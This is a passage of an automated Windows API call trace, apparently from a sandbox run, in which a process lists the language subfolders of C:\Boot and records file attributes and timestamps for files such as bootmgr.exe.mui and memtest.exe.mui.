FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.180] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.180] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.180] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.181] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.181] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0039.181] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0039.181] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.181] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.181] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.181] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.181] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.182] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0039.182] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.182] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.182] CoTaskMemFree (pv=0x4fe370) [0039.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.182] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0039.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.182] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0039.182] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0039.182] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.182] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.183] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.183] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.183] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.183] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.183] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0039.183] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0039.183] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.183] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.184] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.184] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.184] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.184] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0039.184] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.184] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.184] CoTaskMemFree (pv=0x4fe370) [0039.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.184] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0039.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.185] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0039.185] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0039.185] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.221] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.222] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.222] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0039.222] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.222] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.222] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.222] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\memtest.exe.mui", lpFilePart=0x0) returned 0x1d [0039.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.222] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0039.222] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0039.222] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.223] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.223] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.223] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0039.223] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0039.223] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.223] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0039.223] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.223] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.223] CoTaskMemFree (pv=0x4fe370) [0039.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.224] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0039.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.224] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0039.224] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0039.224] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.239] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.239] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.239] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.239] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.239] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.240] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0039.240] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0039.240] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.240] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 